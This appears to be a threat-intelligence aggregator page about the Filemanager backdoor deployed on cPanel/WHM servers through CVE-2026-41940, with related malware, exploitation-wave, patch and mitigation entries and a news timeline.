Filemanager backdoor delivered on compromised cPanel environments
Malware Activity
Summary
Hide ▲
Show ▼
The Filemanager backdoor is being deployed on compromised cPanel/WHM systems, giving attackers remote command execution and shell access. It is delivered through a shell script fetched from wpsock[.]com and used in the ongoing abuse of CVE-2026-41940. The backdoor also supports file management, widening attacker control over affected hosts.
Related Happenings
Showboat Linux post-exploitation backdoor framework
Malware Activity
First: 21.05.2026 17:17
Last: 21.05.2026 17:17
Sources 1
About this happening:
The **Showboat** Linux malware has been identified as a **modular post-exploitation framework** used since **at least mid-2022**, raising the risk of persistent access on compromi...
Showboat Linux post-exploitation backdoor framework
Malware ActivityAbout this happening: The **Showboat** Linux malware has been identified as a **modular post-exploitation framework** used since **at least mid-2022**, raising the risk of persistent access on compromi...
Gremlin stealer modular toolkit evolution
Malware Activity
First: 15.05.2026 17:19
Last: 15.05.2026 17:19
Sources 1
About this happening:
The **Gremlin stealer** malware has expanded into a **modular toolkit** with **session-hijacking** and **crypto clipping** capabilities, raising the risk of credential theft and a...
Gremlin stealer modular toolkit evolution
Malware ActivityAbout this happening: The **Gremlin stealer** malware has expanded into a **modular toolkit** with **session-hijacking** and **crypto clipping** capabilities, raising the risk of credential theft and a...
CPanel & WHM authentication-bypass exploitation wave (CVE-2026-41940)
Exploitation Wave
First: 04.05.2026 11:25
Last: 04.05.2026 11:25
Sources 1
How related:
"Monitoring data shows that more than 2,000 attacker source IPs worldwide are currently involved in automated attacks and cybercrime activities targeting this vulnerability," XLab researchers said.
About this happening:
Active exploitation of **CVE-2026-41940** is driving a **large cPanel & WHM compromise wave**, putting exposed servers at risk of administrative takeover. **More than 40,000 serve...
CPanel & WHM authentication-bypass exploitation wave (CVE-2026-41940)
Exploitation WaveHow related: "Monitoring data shows that more than 2,000 attacker source IPs worldwide are currently involved in automated attacks and cybercrime activities targeting this vulnerability," XLab researchers said.
About this happening: Active exploitation of **CVE-2026-41940** is driving a **large cPanel & WHM compromise wave**, putting exposed servers at risk of administrative takeover. **More than 40,000 serve...
CPanel CVE-2026-41940 mitigation guidance
Advisory/Mitigation
First: 30.04.2026 14:40
Last: 30.04.2026 14:40
Sources 1
About this happening:
cPanel issued mitigation guidance for **CVE-2026-41940** after fixes became available for **cPanel, WHM, and WP Squared**, urging customers to restart **cpsrvd** to reduce exposur...
CPanel CVE-2026-41940 mitigation guidance
Advisory/MitigationAbout this happening: cPanel issued mitigation guidance for **CVE-2026-41940** after fixes became available for **cPanel, WHM, and WP Squared**, urging customers to restart **cpsrvd** to reduce exposur...
CPanel and WHM emergency update for critical auth-bypass
Security Patch Release
First: 29.04.2026 18:51
Last: 29.04.2026 18:51
Sources 1
About this happening:
**WebPros International** released an **emergency update** for **cPanel** and **WHM** after a critical **authentication-bypass** flaw could expose supported installations to **una...
CPanel and WHM emergency update for critical auth-bypass
Security Patch ReleaseAbout this happening: **WebPros International** released an **emergency update** for **cPanel** and **WHM** after a critical **authentication-bypass** flaw could expose supported installations to **una...
Timeline
-
11.05.2026 20:54 2 articles · 16d ago
Mr_Rot13 exploitation of cPanel CVE-2026-41940
Initial DisclosureQiAnXin XLab identifies Mr_Rot13 as abusing CVE-2026-41940 in cPanel and WebHost Manager (WHM) to gain elevated control of compromised servers and deploy the Filemanager backdoor, with automated attacks and cybercrime activity observed worldwide and more than 2,000 attacker source IPs involved.
Show sources
- cPanel CVE-2026-41940 Under Active Exploitation to Deploy Filemanager Backdoor — thehackernews.com — 11.05.2026 20:54
- cPanel CVE-2026-41940 Under Active Exploitation to Deploy Filemanager Backdoor — thehackernews.com — 11.05.2026 20:54